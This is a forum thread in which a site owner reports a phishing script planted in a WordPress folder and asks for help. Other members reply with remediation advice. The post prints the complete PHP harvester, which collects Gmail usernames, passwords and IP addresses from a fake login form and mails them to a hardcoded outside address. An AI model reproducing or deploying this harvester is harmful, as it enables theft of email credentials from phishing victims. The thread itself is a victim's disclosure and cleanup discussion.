1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Got this code injected into my site. Be aware

Discussion in 'Black Hat SEO' started by massonspy, Dec 13, 2012.

  1. massonspy

    massonspy Junior Member

    Joined:
    Apr 3, 2010
    Messages:
    130
    Likes Received:
    23
    Occupation:
    Health Pro
    Google is not as bad as it seems :) Hostgator didnt even bother.
    Sent me an email today warning i had a folder installed into /wp-includes/js/remax/
    I don't know how it got there but G suggested to clean the site and change file permissions.
    I called hostgator, will see what they think. May be its a known error.

    Google also said once you have taken all these measures re-submit the site here
    HTML:
    http://www.google.com/safebrowsing/report_error/?tpl=emailer
    Anyone had experienced such code before?

    Here what the code looks like and there is one for every popular email provider.
    I also have received some weird emails coming from emails that looked exactly the same as mine. Chekced the header they were made to look the same.

    PHP:
    <?php

    session_start
    ();

    $ip getenv("REMOTE_ADDR");

    $adddate=date("D M d, Y g:i a");

    $message .= "--------      UserID      ------------------------------\n";

    $message .= "UserID: ".$_POST['gmailuser']."\n";

    $message .= "Password: ".$_POST['gmailpassword']."\n";

    $message .= "======================================\n";

    $message .= "IP: ".$ip."\n";

    $message .= "Date: ".$adddate."\n";

    $message .= "--------Created By Wire Wizard------------------------------\n";

    $recipient "jonathan1945a@gmail.com";

    $subject "Gmail - Created By Cheikh";

    $headers "From: ";

    $headers .= $_POST['eMailAdd']."\n";

    $headers .= "MIME-Version: 1.0\n";

         if (
    mail($recipient,$subject,$message,$headers))

           {

               
    header("Location: http://www.remax.com/");

           }

    ?>Wizard
    Is there anyway i can track where it came from?
     
  2. subster

    subster Elite Member

    Joined:
    Apr 5, 2008
    Messages:
    1,864
    Likes Received:
    1,448
    Location:
    Krauthausen
    Change all your password, secure your installation, removed nulled plugins and check your machine for trojans.
    Also it seem that this is just the part of a script and there other files injected.
    Use this script to find encoded scripts on your installation and remove them. Best would be to set up wordpress from a secure source in a new folder (not only overwriting).
     
  3. themidiman

    themidiman Power Member

    Joined:
    Feb 25, 2011
    Messages:
    701
    Likes Received:
    1,536
    Location:
    root@pts/0
    Yeah, first thing to do is to change passwords. Is this a shared account/VPS/Reseller? If you have access to the server, run a maldet. HG really can't constantly scan your server for malware 24/7, best hosts in the world don't do that. If you don't have access to the server, tell them to run a malware detection on the server, and ensure that they delete the infected files, not just chmod 000. This will make sure your resubmit with G goes well.
     
  4. aftershock2020

    aftershock2020 Senior Member

    Joined:
    Oct 19, 2007
    Messages:
    981
    Likes Received:
    477
    Totally agree with you on that. Looks that way to me as well.

    @massonspy - take this advice, bud. something seriously funky going on there and it will risk taking down the entire server if you aren't careful, as you are obviously on a shared device if you are using hostgator hosting.

    That's all they use, short of their blade vps systems, which suck just as badly as the shared servers.
     
  5. Scritty

    Scritty Elite Member Premium Member

    Joined:
    May 1, 2010
    Messages:
    2,807
    Likes Received:
    4,496
    Occupation:
    Affiliate Marketer
    Location:
    UK
    Home Page:
    Hostgator offers a full secure backup in a .tar file.
    If you've subscribed to that I would completely delete your site MySql database and all - and do a 100% backup with new passwords.
    Also the WP keys (remember them)
    Passwords on wordpress - I tend to use 48 characters upper case, lower case numbers and specials (and user name is NEVER admin - that's half the job done for the hacker).

    If you've got a backup service then your site can be clean and running again inside 45 minutes.
    Without it .......

    Scritty
     
  6. massonspy

    massonspy Junior Member

    Joined:
    Apr 3, 2010
    Messages:
    130
    Likes Received:
    23
    Occupation:
    Health Pro
    Sorry for the late reply, HG run an anti virus and said cleaned it all.
    I just changed pass for host and WP seems fine now.

    This is hosted on a reseller account i own. I guess its considered shared too..